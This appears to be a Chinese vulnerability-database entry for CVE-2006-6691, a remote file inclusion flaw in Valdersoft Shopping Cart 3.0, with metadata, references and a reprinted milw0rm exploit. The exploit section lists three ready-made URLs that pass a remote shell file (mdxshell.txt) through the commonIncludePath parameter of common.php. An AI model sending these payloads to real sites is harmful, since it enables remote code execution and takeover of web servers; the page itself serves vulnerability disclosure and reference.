Valdersoft Shopping Cart 'Common.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111811 漏洞类型 输入验证
发布时间 2006-12-20 更新时间 2006-12-22
CVE编号 CVE-2006-6691 CNNVD-ID CNNVD-200612-474
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2964
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-474
|漏洞详情
ValdersoftShoppingCart3.0及之前版本存在多个PHP远程文件包含漏洞。远程攻击者可以借助传给(1)admin/include/common.php,(2)include/common.php或(3)common_include/common.php中的commonIncludePath参数当中的URL,执行任意PHP代码。
|漏洞EXP
******************************************************************************************************
*Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
*
+/common_include/common.php , /include/common.php, /admin/include/common.php*
*
*
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+    include ( $commonIncludePath."common.php" );                           *
+                                                                           *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?*+
+********************************************************************************************+
+ http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxshell.txt?*******+
+********************************************************************************************+
+ http://www.site.***/[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?+
+********************************************************************************************+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                                                                                            *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************                                                                          *
**********************************************************************************************

# milw0rm.com [2006-12-20]
|参考资料

来源:XF
名称:shoppingcart-common-file-include(30984)
链接:http://xforce.iss.net/xforce/xfdb/30984
来源:BID
名称:21685
链接:http://www.securityfocus.com/bid/21685
来源:MILW0RM
名称:2964
链接:http://www.milw0rm.com/exploits/2964
来源:VUPEN
名称:ADV-2006-5101
链接:http://www.frsirt.com/english/advisories/2006/5101
来源:SECUNIA
名称:23464
链接:http://secunia.com/advisories/23464
来源:MILW0RM
名称:2964
链接:http://milw0rm.com/exploits/2964